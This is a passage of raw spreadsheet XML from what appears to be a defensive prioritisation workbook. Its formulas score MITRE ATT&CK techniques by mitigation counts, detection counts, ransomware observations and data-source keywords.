        <f>IF(AF274="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH274" s="25" t="str" cm="1">
        <f t="array" ref="AH274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI274" s="25">
        <f>IF(AH274="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ274" s="25" t="str" cm="1">
        <f t="array" ref="AJ274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC274)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK274" s="25">
        <f>IF(AJ274="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL274" s="25" t="str" cm="1">
        <f t="array" ref="AL274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM274" s="25">
        <f>IF(AL274="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN274" s="60">
        <v>0</v>
      </c>
      <c r="AO274" s="51">
        <v>0</v>
      </c>
      <c r="AP274" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1376190476190474E-2</v>
      </c>
      <c r="AQ274" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10458730158730158</v>
      </c>
      <c r="AR274" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10458730158730158</v>
      </c>
      <c r="AS274" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT274" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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75" spans="1:47" ht="32.1">
      <c r="A275" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1376190476190474E-2</v>
      </c>
      <c r="B275" s="25">
        <f>SUM(H275,M275,V275)*(1+SUM(AE275,AG275,AI275,AK275,AM275))</f>
        <v>0.31376190476190474</v>
      </c>
      <c r="C275" s="25" t="s">
        <v>1160</v>
      </c>
      <c r="D275" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E275" s="25" t="s">
        <v>1161</v>
      </c>
      <c r="F275" s="51">
        <v>1</v>
      </c>
      <c r="G275" s="51">
        <v>1</v>
      </c>
      <c r="H275" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I275">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J275">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K275">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L275">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M275" s="25">
        <v>0</v>
      </c>
      <c r="N275" s="51">
        <v>0</v>
      </c>
      <c r="O275" s="51">
        <v>0</v>
      </c>
      <c r="P275" s="51">
        <v>0</v>
      </c>
      <c r="Q275" s="51">
        <v>0</v>
      </c>
      <c r="R275" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S275" s="51">
        <v>8</v>
      </c>
      <c r="T275" s="51" t="s">
        <v>1162</v>
      </c>
      <c r="U275" s="51">
        <v>9</v>
      </c>
      <c r="V275" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W275">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X275">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y275">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z275">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA275">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB275">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC275" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD275" s="25" t="str" cm="1">
        <f t="array" ref="AD275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC275)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE275" s="25">
        <f>IF(AD275="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF275" s="25" t="str" cm="1">
        <f t="array" ref="AF275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG275" s="25">
        <f>IF(AF275="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH275" s="25" t="str" cm="1">
        <f t="array" ref="AH275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI275" s="25">
        <f>IF(AH275="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ275" s="25" t="str" cm="1">
        <f t="array" ref="AJ275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK275" s="25">
        <f>IF(AJ275="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL275" s="25" t="str" cm="1">
        <f t="array" ref="AL275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM275" s="25">
        <f>IF(AL275="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN275" s="58">
        <v>0</v>
      </c>
      <c r="AO275" s="51">
        <v>0</v>
      </c>
      <c r="AP275" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1376190476190474E-2</v>
      </c>
      <c r="AQ275" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10458730158730158</v>
      </c>
      <c r="AR275" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10458730158730158</v>
      </c>
      <c r="AS275" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT275" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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76" spans="1:47">
      <c r="A276" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.47095238095238E-2</v>
      </c>
      <c r="B276" s="25">
        <f>SUM(H276,M276,V276)*(1+SUM(AE276,AG276,AI276,AK276,AM276))</f>
        <v>0.31376190476190469</v>
      </c>
      <c r="C276" s="25" t="s">
        <v>1163</v>
      </c>
      <c r="D276" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E276" s="25" t="s">
        <v>1164</v>
      </c>
      <c r="F276" s="51">
        <v>1</v>
      </c>
      <c r="G276" s="51">
        <v>1</v>
      </c>
      <c r="H276" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I276">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J276">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K276">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L276">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M276" s="25">
        <v>0</v>
      </c>
      <c r="N276" s="51">
        <v>2</v>
      </c>
      <c r="O276" s="51">
        <v>17</v>
      </c>
      <c r="P276" s="51">
        <v>2</v>
      </c>
      <c r="Q276" s="51">
        <v>3</v>
      </c>
      <c r="R276" s="52">
        <v>10.5</v>
      </c>
      <c r="S276" s="51">
        <v>1</v>
      </c>
      <c r="T276" s="52" t="s">
        <v>813</v>
      </c>
      <c r="U276" s="51">
        <v>4</v>
      </c>
      <c r="V276" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476188</v>
      </c>
      <c r="W276">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>5</v>
      </c>
      <c r="X276">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>9.0909090909090912E-2</v>
      </c>
      <c r="Y276">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>9.0909090909090912E-2</v>
      </c>
      <c r="Z276">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>24</v>
      </c>
      <c r="AA276">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.24</v>
      </c>
      <c r="AB276">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.24</v>
      </c>
      <c r="AC276" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD276" s="25" t="str" cm="1">
        <f t="array" ref="AD276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC276)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE276" s="25">
        <f>IF(AD276="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF276" s="25" t="str" cm="1">
        <f t="array" ref="AF276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG276" s="25">
        <f>IF(AF276="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH276" s="25" t="str" cm="1">
        <f t="array" ref="AH276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI276" s="25">
        <f>IF(AH276="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ276" s="25" t="str" cm="1">
        <f t="array" ref="AJ276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK276" s="25">
        <f>IF(AJ276="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL276" s="25" t="str" cm="1">
        <f t="array" ref="AL276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM276" s="25">
        <f>IF(AL276="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN276" s="52">
        <v>1</v>
      </c>
      <c r="AO276" s="51">
        <v>1</v>
      </c>
      <c r="AP276" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.47095238095238E-2</v>
      </c>
      <c r="AQ276" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10458730158730156</v>
      </c>
      <c r="AR276" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10458730158730156</v>
      </c>
      <c r="AS276" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT276" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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77" spans="1:47">
      <c r="A277" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6190476190476184E-2</v>
      </c>
      <c r="B277" s="25">
        <f>SUM(H277,M277,V277)*(1+SUM(AE277,AG277,AI277,AK277,AM277))</f>
        <v>0.26190476190476186</v>
      </c>
      <c r="C277" s="25" t="s">
        <v>1165</v>
      </c>
      <c r="D277" s="25" t="s">
        <v>245</v>
      </c>
      <c r="E277" s="25" t="s">
        <v>898</v>
      </c>
      <c r="F277" s="51">
        <v>1</v>
      </c>
      <c r="G277" s="51">
        <v>1</v>
      </c>
      <c r="H277" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I277">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J277">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K277">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L277">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M277" s="25">
        <v>0</v>
      </c>
      <c r="N277" s="51">
        <v>2</v>
      </c>
      <c r="O277" s="51">
        <v>7</v>
      </c>
      <c r="P277" s="51">
        <v>0</v>
      </c>
      <c r="Q277" s="51">
        <v>11</v>
      </c>
      <c r="R277" s="52" t="s">
        <v>246</v>
      </c>
      <c r="S277" s="51">
        <v>4</v>
      </c>
      <c r="T277" s="51" t="s">
        <v>247</v>
      </c>
      <c r="U277" s="51">
        <v>3</v>
      </c>
      <c r="V277" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476188</v>
      </c>
      <c r="W277">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X277">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y277">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z277">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>20</v>
      </c>
      <c r="AA277">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.2</v>
      </c>
      <c r="AB277">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="AC277" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD277" s="25" t="str" cm="1">
        <f t="array" ref="AD277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE277" s="25">
        <f>IF(AD277="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF277" s="25" t="str" cm="1">
        <f t="array" ref="AF277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC277)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG277" s="25">
        <f>IF(AF277="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH277" s="25" t="str" cm="1">
        <f t="array" ref="AH277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI277" s="25">
        <f>IF(AH277="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ277" s="25" t="str" cm="1">
        <f t="array" ref="AJ277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK277" s="25">
        <f>IF(AJ277="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL277" s="25" t="str" cm="1">
        <f t="array" ref="AL277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM277" s="25">
        <f>IF(AL277="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN277" s="60">
        <v>0</v>
      </c>
      <c r="AO277" s="51">
        <v>0</v>
      </c>
      <c r="AP277" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6190476190476184E-2</v>
      </c>
      <c r="AQ277" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7301587301587283E-2</v>
      </c>
      <c r="AR277" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7301587301587283E-2</v>
      </c>
      <c r="AS277" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT277" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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78" spans="1:47" ht="32.1">
      <c r="A278" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4200000000000008E-2</v>
      </c>
      <c r="B278" s="25">
        <f>SUM(H278,M278,V278)*(1+SUM(AE278,AG278,AI278,AK278,AM278))</f>
        <v>0.34200000000000008</v>
      </c>
      <c r="C278" s="25" t="s">
        <v>1166</v>
      </c>
      <c r="D278" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E278" s="25" t="s">
        <v>1167</v>
      </c>
      <c r="F278" s="51">
        <v>1</v>
      </c>
      <c r="G278" s="51">
        <v>1</v>
      </c>
      <c r="H278" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I278">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J278">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K278">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L278">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M278" s="25">
        <v>0</v>
      </c>
      <c r="N278" s="51">
        <v>0</v>
      </c>
      <c r="O278" s="51">
        <v>0</v>
      </c>
      <c r="P278" s="51">
        <v>1</v>
      </c>
      <c r="Q278" s="51">
        <v>0</v>
      </c>
      <c r="R278" s="52" t="s">
        <v>1116</v>
      </c>
      <c r="S278" s="51">
        <v>6</v>
      </c>
      <c r="T278" s="52" t="s">
        <v>1168</v>
      </c>
      <c r="U278" s="51">
        <v>10</v>
      </c>
      <c r="V278" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15714285714285717</v>
      </c>
      <c r="W278">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X278">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y278">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z278">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA278">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB278">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC278" s="29" t="s">
        <v>256</v>
      </c>
      <c r="AD278" s="25" t="str" cm="1">
        <f t="array" ref="AD278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC278)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE278" s="25">
        <f>IF(AD278="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF278" s="25" t="str" cm="1">
        <f t="array" ref="AF278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG278" s="25">
        <f>IF(AF278="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH278" s="25" t="str" cm="1">
        <f t="array" ref="AH278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC278)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI278" s="25">
        <f>IF(AH278="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ278" s="25" t="str" cm="1">
        <f t="array" ref="AJ278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK278" s="25">
        <f>IF(AJ278="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL278" s="25" t="str" cm="1">
        <f t="array" ref="AL278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM278" s="25">
        <f>IF(AL278="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN278" s="60">
        <v>0</v>
      </c>
      <c r="AO278" s="51">
        <v>0</v>
      </c>
      <c r="AP278" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4200000000000008E-2</v>
      </c>
      <c r="AQ278" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11400000000000003</v>
      </c>
      <c r="AR278" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11400000000000003</v>
      </c>
      <c r="AS278" s="25">
